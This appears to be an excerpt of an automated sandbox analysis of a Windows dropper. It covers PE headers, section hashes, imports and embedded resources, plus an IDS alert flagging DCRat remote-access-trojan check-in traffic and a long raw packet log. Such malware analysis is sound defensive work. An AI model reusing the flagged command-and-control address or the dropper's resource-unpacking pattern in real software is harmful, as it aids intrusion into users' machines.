                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x20bc0x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000xb73b80.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000xbc.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000xc260xe00a941ede160cf12509be8dd37ae2b6a57False0.47935267857142855data5.1463325678068115IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x20000x4c00x600930587e8eece4537e4be6a4476dc03faFalse0.4055989583333333data4.212357479426224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x30000xd6f00x6007f95694b637a8e9d84e496462c4af938False0.16927083333333334data1.7255508052001818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x110000xb73b800xb73c00a6d4949e2c72cf313fe64deefafd7e7cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  IMAGE0x110dc0x42PC bitmap, Windows 3.x format, 1 x 1 x 1, image size 4, cbSize 66, bits offset 62EnglishUnited States0.5151515151515151
                                                  RT_RCDATA0x111200xb73a08data0.9961528778076172
                                                  RT_RCDATA0xb84b280x57PGP Secret Sub-key -0.8045977011494253
                                                  DLLImport
                                                  shlwapi.dllPathFindFileNameA
                                                  kernel32.dllLockResource, lstrlenA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, GlobalFree, HeapAlloc, HeapFree, LoadLibraryA, LoadResource, lstrcpynA, RtlMoveMemory, SetFileAttributesA, SizeofResource, WriteFile, lstrcatA, lstrcpyA
                                                  user32.dllCreateWindowExA, DefWindowProcA, DispatchMessageA, GetMessageA, LoadCursorA, LoadIconA, MessageBoxA, PostQuitMessage, RegisterClassExA, SendMessageA, ShowWindow, TranslateMessage, UpdateWindow
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  06/21/24-04:29:08.213871TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M480544385.101.152.137192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 21, 2024 04:27:20.071629047 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.071716070 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:20.071794033 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.084573030 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.084605932 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:20.762425900 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:20.762523890 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.772108078 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.772152901 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:20.772608042 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:20.820535898 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:20.864523888 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:21.188208103 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:21.188476086 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:21.188545942 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:21.188608885 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:21.188642979 CEST44349731140.82.121.3192.168.2.4
                                                  Jun 21, 2024 04:27:21.188714981 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:21.207979918 CEST49731443192.168.2.4140.82.121.3
                                                  Jun 21, 2024 04:27:21.218497038 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.218589067 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.218687057 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.218889952 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.218929052 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.691158056 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.691253901 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.693126917 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.693161964 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.693568945 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.697693110 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.740509033 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.811847925 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812021971 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812108040 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812135935 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.812179089 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812278986 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812333107 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.812342882 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812385082 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.812393904 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812530994 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812573910 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.812582970 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812705994 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.812762976 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.812777042 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.818959951 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.823105097 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.823121071 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.867696047 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.902401924 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.902595997 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.902673960 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.902687073 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.902719975 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.902775049 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.902810097 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.902965069 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903049946 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903114080 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.903136015 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903227091 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903284073 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.903297901 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903345108 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.903429985 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903587103 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.903646946 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.903661013 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904139996 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904205084 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.904234886 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904320955 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904407024 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904434919 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.904448986 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.904519081 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.904535055 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.905081034 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.905154943 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.905167103 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.905191898 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.905395985 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.905410051 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.945822001 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.953254938 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.989664078 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.989727974 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.989744902 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.989882946 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.989938021 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.989952087 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990036011 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990098953 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.990113020 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990192890 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990395069 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990442038 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.990456104 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990699053 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990760088 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.990772963 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.990819931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.990833044 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992379904 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992400885 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992448092 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992449999 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.992513895 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992539883 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.992600918 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.992600918 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.992600918 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.994134903 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.994174004 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.994230986 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:21.994266033 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:21.994294882 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.039688110 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.044302940 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.044344902 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.044385910 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.044430971 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.044464111 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.044544935 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.077805996 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.077850103 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.077919960 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.077996016 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.078030109 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.078099012 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.078811884 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.078855991 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.078885078 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.078901052 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.078927994 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.078947067 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.079646111 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.079687119 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.079715014 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.079729080 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.079757929 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.079909086 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.080219030 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.080275059 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.080295086 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.080317020 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.080368042 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.080368996 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.082706928 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.082750082 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.082777023 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.082791090 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.082843065 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.082844019 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.083362103 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.083405972 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.083448887 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.083467960 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.083489895 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.083523989 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.133162975 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.133210897 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.133240938 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.133263111 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.133299112 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.133341074 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.174515009 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.174583912 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.174623013 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.174660921 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.174686909 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.174746990 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.174906015 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.174964905 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.175035000 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.175048113 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.175072908 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.175126076 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.175913095 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.175956964 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.175992966 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.176007032 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.176035881 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.176055908 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.176831961 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.176882982 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.176911116 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.176923990 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.176969051 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.176969051 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.177016973 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.177062035 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.177098036 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.177109957 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.177136898 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.177156925 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178004980 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178049088 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178075075 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178088903 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178133965 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178133965 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178689957 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178733110 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178771973 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178792953 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.178819895 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.178883076 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.220940113 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.220990896 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.221018076 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.221044064 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.221066952 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.221088886 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.261976957 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262022972 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262057066 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.262083054 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262106895 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.262126923 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.262701988 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262743950 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262782097 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.262794971 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.262821913 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.262841940 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.263482094 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.263530016 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.263554096 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.263586998 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.263614893 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.263636112 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.264146090 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.264189005 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.264218092 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.264231920 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.264259100 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.264276981 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.264978886 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265021086 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265049934 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.265064001 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265089989 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.265125990 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.265688896 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265748024 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265772104 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.265784979 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.265831947 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.265831947 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.266598940 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.266653061 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.266684055 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.266696930 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.266725063 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.266743898 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.308674097 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.308758020 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.308770895 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.308840036 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.308873892 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.308900118 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.355956078 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356012106 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356060028 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.356100082 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356151104 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.356755972 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356801987 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356833935 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.356848001 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.356895924 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.356897116 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.356991053 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.357033014 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.357054949 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.357074022 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.357098103 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.357099056 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.357126951 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.357933044 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.357974052 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.358027935 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.358042002 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.358074903 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.358094931 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.358709097 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.358750105 CEST44349732185.199.109.133192.168.2.4
                                                  Jun 21, 2024 04:27:22.358783007 CEST49732443192.168.2.4185.199.109.133
                                                  Jun 21, 2024 04:27:22.358797073 CEST44349732185.199.109.133192.168.2.4
